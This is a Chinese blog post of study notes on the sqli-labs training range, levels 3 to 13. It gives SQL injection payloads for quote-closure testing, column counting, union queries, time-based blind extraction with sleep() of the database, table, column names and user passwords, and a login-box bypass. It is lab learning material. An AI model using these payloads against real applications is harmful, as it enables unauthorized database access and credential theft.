sqli-labs学习笔记2

最新推荐文章于 2024-05-02 01:04:40 发布
最新推荐文章于 2024-05-02 01:04:40 发布
阅读量1k 收藏
点赞数 1
文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shayebudon/article/details/120641738
版权

Less-3

一、判断注入类型

首先判断是数字型注入还是字符型注入

输入?id=1 查看回显

输入?id=1'

 输入?id=1"

 输入单引号时页面异常,输入双引号时页面正常   从回显的信息看来,它是由’)来进行闭合的,所以我们尝试输入’)进行闭合再输入–+注释掉后面的代码,结果显示页面正常显示。由此可推出参数是’)进行闭合的!此时可以输入and 1=1 和and 1=2来比较

输入?id=1' and 1=1

输入?id=1') and 1=2

此时证明了上述假设的闭合方式 

二、猜解字段数

使用order by

输入?id=1' order by 4 --+(--+为注释语句)发现报错

输入?id=1') order by 3 --+

页面正常,说明字段数为3

其余注入与第一题相同

Less-4

一、找漏洞

输入?id=1查看回显

第四关使用(“”)的方式闭合字符串

 当输入?id=1"时,页面显示错误

 输入?id= 1") and 1=2 union select 1,2,3 --+页面正常

其余注入与第一题相同

Less-5

一、找漏洞

输入?id= 1查看回显

 输入?id= 1'页面报错

输入?id=1' union select 1,2,3 --+页面显示

无法进行下一步

需要用到新的知识

时间延迟型注入手工注入

时间延迟型手工注入,正确会延迟,错误没有延迟。可以通过浏览器的刷新提示观察延迟情况,但是id正确的时候的回显有利于观察。

我们构造sql语句,带上时间延迟的函数,如果有明显的延迟说明有注入点。

?id=1’ and if(length(database())=n,sleep(5),1)--+

当n为8时,出现明显的延迟,说明有注入点

猜库名

数据库第一个字符为s,加下来以此增加left(database(),字符长度)中的字符长度,等号右边以此爆破下一个字符,正确匹配时会延迟。最终爆破得到left(database(),8)='security'

?id=1' and if(left(database(),1)='s',sleep(5),1)--+

猜表名

?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)='users',sleep(5),5)--+

经过几次尝试找到了表名。

猜列名

?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password',sleep(5),1)--+

首先尝试定向爆破,以提高手工注入速度,修改limit x,1 中的x查询password是否存在表中,lucky的是limit 3,1的时候查到了password列,同样的方法查询username ,又一个lucky

猜值

?id=1’ and if(left((select password from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+

?id=1’ and if(left((select username from users order by id limit 0,1),4)=‘dumb’ ,sleep(5),1)–+

按照id排序,这样便于对应。注意limit 从0开始.通过坚持不懈的尝试终于爆破到第一个用户的名字dumb,密码dumb,需要注意的是,mysql对大小写不敏感,所以你不知道是Dumb 还是dumb

到这里建议使用sqlmap 

Less-6

查询了第一个,输入的id使用“包裹,其余和第五关一致
所以只需要我们换成双引号即可

Less-7

Less-8

首先输入?id=1 查看回显,发现除了输入?id=1时显示you are in ... 别的都不显示

 可以使用盲注

输入?id=1' and if(length(database())=8,sleep(5),1) --+ 页面出现延迟五秒 说明数据库长度为8

 其余步骤和Less-5相同

Less-9

首先输入?id=1查看回显,发现无论输入说明 都是显示you are in ...

 可以使用时间盲注,同Less-5 Less-8

Less-10

个人认为Less-10和Less-9相同,无论输什么都不动,区别就在于Less-9是基于单引号的时间注入

Less-10是基于双引号的时间注入

Less-11

 第十一关开始进入登录框这种模式,像登陆框这种模式也是可以当成sql语句注入

使用万能密码时可以登录
admin' or 1 #)
是一个dump用户,当然admin也可以登录

 使用burp

输入admin' order by 3 报错

 输入admin' order by 2 --+ 正确

发现1,2可以回显 正常查询即可

 Less-12

输入admin")发现闭合

其余同十一关

Less-13

shayebudon
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqli-Lab靶场-基础篇笔记
Pr0m1se1n的博客
11-26 1171
SQL注入之联合查询注入&报错注入&SQL文件读取文件写入&盲注
学习笔记-SQLi
人饭子的博客
11-01 271
学习笔记-# SQLi 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 注入检测 MySQL MSSQL Oracle H2 database BigQuery SQLite 描述 注入攻击的本质,是程序把用户输入的数据当做代码执行。这里有两个关键条件,第一是用户能够控制输入;第二是用户输入的数据被拼接到要执行的代码...
sqli通关笔记
一颗小白菜的博客
11-15 289
增加数据删除数据删数据delete from 表名;delete from 表名 where id=1;删结构drop database 数据库名;//删除数据库drop table 表名;//删除表alter table 表名 drop column 列名;eg:修改数据修改所有:update 表名 set 列名=‘新的值,非数字加单引号’;带条件的修改:update 表名 set 列名=‘新的值,非数字加单引号’ where id=6;eg:HTTP 头部详解。
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sqli-labs 笔记
Lyn_10086的博客
09-28 2557
sqli-lbs笔记:test 1 一、搭建与数据库的初始化 1、搭建前准备: 搭建用phpstudy搭建 下载phpstudy:下载官网 下载完成后打开Apache+MySQL功能 点击网站,再单击左上角的创建网站,把根目录改到WWW下,点击确定,网站即可创建成功。 后注: php的版本要选择5.6 不然创建数据库的时候就会失败 2、搭建环境 Sqli-labs项目地址—Github获取 将下载的sqli文件解压到PHP study的WWW目录下 解压后进入sqli下的sql-connection
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-lab学习笔记学习笔记)(1-10)
大方子
08-07 2710
经常会犯的错误: 1.在hackbar里面忘记用%23替代# 2.在用下一条语句的时候忘记更改limit的值导致结果显示不出来 3.双注入里面的语句忘记加()日志是我后来想到发的,前面几关也都基础简单的,giantbranch大佬写的挺好的很详细,我也是按他的一步步学习来的,然后在里面增加自己的知识点和内容,对他进行补充和说明 他的文章地址:http://blog.csdn.net/u012
sqli笔记
gbxiaowang的博客
07-06 152
sql语句: select* from 表名 where 列名=值 and(or) 1=1 && || 第一关代码: $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); 构造语句: (注释语句 --+在marinedb中不能执行,为了保险起见,用–还有–+以及#进行尝试,sql版本不一样可能采取不一样的注释符) id=1' and 1=1 --+ 执行 id=1' and 1&a
SQLi-Labs 学习笔记(Less 1-10)
热门推荐
Onlyme的博客
03-11 1万+
点击打开链接http://blog.csdn.net/u012763794/article/details/51207833http://blog.csdn.net/u012763794/article/details/51361152http://blog.csdn.net/u012763794/article/details/51457142Less-1 基于错误的 - get 单引号 - 字...
SQL 基础 | BETWEEN 的常见用法
少安事务所
04-30 296
来选取列中的值,这些值大于或等于一个边界值,同时小于或等于另一个边界值。操作符是SQL中非常有用的工具,它允许你快速选取某个范围内的值。这个查询不会返回任何行,因为没有任何列的值可以位于一个以。操作符是包含性的,这意味着它包括指定的边界值。是一个操作符,用于选取介于两个值之间的数据。操作符结合使用,以选取字符串中的一个范围。也常用于选取特定日期范围内的记录。子句中,以便选取某个范围内的值。相反,它选取不在这个范围内的值。
手撕spring框架(3)
dzend的专栏
05-01 604
在Spring框架中,BeanPostProcessor是一个接口,它允许在Spring容器实例化bean之后和调用bean的初始化方法之前对bean进行自定义处理。BeanPostProcessor接口定义了两个方法:postProcessBeforeInitialization和postProcessAfterInitialization。通过实现这两个方法,我们可以在bean初始化前后做一些额外的操作,比如修改bean的属性值、添加额外的逻辑等。
常用SQL命令
最新发布
wenxiaoba的博客
05-02 1114
常用SQL语句使用说明和示例
优化SQL的方法
weixin_44139651的博客
04-26 1577
使用join实现,但不适合join太多表,阿里巴巴开发者手册的规定,join表的数量不应该超过3个,join表数量太多时,会导致mysql在选错索引。一般SQL优化第一考虑的是索引优化,可使用explain命令,查看MySQL的执行计划,确认SQL是否有走索引。相对连接查询,子查询使用in关键字实现,具有结构化,相对简单,但是需要创建和删除临时表,增加资源消耗。索引可提升SQL效率,但索引需要额外的存储空间,而且还会有一定的性能消耗。left join,两个表的交集,以及左表剩余的数据,左表为驱动表。
Oracle 存过 与Postgresql 的存过的差别
simensk的博客
04-30 522
Oracle 11g的存储过程(Stored Procedure)和PostgreSQL 16的存储过程(在PostgreSQL中通常称为函数或过程,但从PostgreSQL 11开始正式引入了存储过程的概念)之间存在一些异同点。总的来说,虽然Oracle 11g的存储过程和PostgreSQL 16的存储过程(或函数)在概念上相似,但在具体实现和使用上存在一些差异。5、工具和生态系统:Oracle和PostgreSQL有不同的工具和生态系统,这可能会影响存储过程和函数的开发、部署和管理。
sqli-labs-master
07-22
sqli-labs-master是一个SQL注入漏洞测试平台,安装教程如下: 1. 下载sqli-labs-master压缩包并解压缩。 2. 安装LAMP或WAMP环境,确保Apache、MySQL和PHP已经安装并配置好。 3. 将解压缩后的sqli-labs-master...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值